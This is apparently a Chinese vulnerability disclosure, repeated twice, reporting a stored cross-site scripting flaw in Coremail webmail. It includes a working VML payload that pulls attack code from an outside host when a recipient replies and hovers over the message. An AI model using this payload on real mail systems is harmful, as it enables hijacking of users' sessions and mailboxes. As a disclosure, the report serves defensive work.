VULHUB ™

### 简要描述： 盈世信息科技（北京）有限公司（www.Mailtech.cn），是网易（Nasdaq: NTES）的联营公司,拥有双软认证、高科技企业等多种资质。公司专注于提供电子邮件整体技术解决方案及企业邮局运营服务。公司决策层包括网易高层及国外资深投资人士，管理层由国内电子邮件行业的元老级技术专家和营销专家组成,拥有三大邮件市场品牌 Coremail邮件系统软件、CorpEase企业邮局和iCoremail专业邮件系统托管。盈世总部设立于北京，在上海、广州、武汉、成都、西安等地设立分部。 讲了那么多，目测5分 ### 详细说明： 未过滤XML代码 正文插入即可 ``` <vmlframe xmlns="urn:schemas-microsoft-com:vml" style="behavior:url(#default#vml);position:absolute;width:100%;height:100%" src="http://itsokla.duapp.com/shouzi.vml#xss"></vmlframe> ``` ### 漏洞证明： 需要在回复的时候触发，onmouseover [<img src="https://images.seebug.org/upload/201412/2314390069e3fee2966c1df0bc78b3f91095379a.jpg" alt="1.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/2314390069e3fee2966c1df0bc78b3f91095379a.jpg) [<img src="https://images.seebug.org/upload/201412/231439109141557b8693ca59ed08bf782c44dbdc.jpg" alt="2.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/231439109141557b8693ca59ed08bf782c44dbdc.jpg)

### 简要描述： 盈世信息科技（北京）有限公司（www.Mailtech.cn），是网易（Nasdaq: NTES）的联营公司,拥有双软认证、高科技企业等多种资质。公司专注于提供电子邮件整体技术解决方案及企业邮局运营服务。公司决策层包括网易高层及国外资深投资人士，管理层由国内电子邮件行业的元老级技术专家和营销专家组成,拥有三大邮件市场品牌 Coremail邮件系统软件、CorpEase企业邮局和iCoremail专业邮件系统托管。盈世总部设立于北京，在上海、广州、武汉、成都、西安等地设立分部。 讲了那么多，目测5分 ### 详细说明： 未过滤XML代码 正文插入即可 ``` <vmlframe xmlns="urn:schemas-microsoft-com:vml" style="behavior:url(#default#vml);position:absolute;width:100%;height:100%" src="http://itsokla.duapp.com/shouzi.vml#xss"></vmlframe> ``` ### 漏洞证明： 需要在回复的时候触发，onmouseover [<img src="https://images.seebug.org/upload/201412/2314390069e3fee2966c1df0bc78b3f91095379a.jpg" alt="1.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/2314390069e3fee2966c1df0bc78b3f91095379a.jpg) [<img src="https://images.seebug.org/upload/201412/231439109141557b8693ca59ed08bf782c44dbdc.jpg" alt="2.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/231439109141557b8693ca59ed08bf782c44dbdc.jpg)